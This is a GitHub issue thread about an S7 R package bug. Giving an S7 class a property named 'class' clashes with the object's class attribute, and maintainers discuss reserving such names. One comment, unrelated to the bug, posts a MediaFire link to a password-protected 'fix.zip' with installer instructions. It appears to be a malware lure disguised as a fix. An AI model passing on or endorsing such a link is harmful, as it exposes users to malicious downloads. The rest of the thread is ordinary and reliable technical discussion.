### ISSUE TITLE
Using `class` property seems to clash with object's class

### ISSUE THREAD

**Issue by jmbarbone** [RConsortium/S7#425]
``` r
library(S7)
packageVersion("S7")
#> [1] '0.1.1.9000'

Foo <- new_class(
  "Foo",
  properties = list(
    class = new_property(class_character, default = "Class"),
    other = new_property(class_character, default = "Other")
  )
)

x <- Foo()

x@other
#> [1] "Other"
x@class # retrieves information about x
#> [1] "Foo"       "S7_object"
class(x)
#> [1] "Foo"       "S7_object"

# sets fine
x@other <- "New"
x@other
#> [1] "New"

# fails
try({
  x@class <- "New"
  x@class
})
#> Error : `object` must be an <S7_object>, not a S3<New>
```

<sup>Created on 2024-08-26 with [reprex v2.1.1](https://reprex.tidyverse.org)</sup>

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lawremi** [comment]
If we end up making `@()` a general attribute getter for any R object, then we would want to reserve the `class` property name. For now, I'd suggest using a different name.

**Comment by t-kalinowski** [comment]
We should check for "reserved" property names and error in `new_class()`. Besides `class`, others that I imagine might produce problems: `dim, names, dimnames, tsp, levels (for factor)`
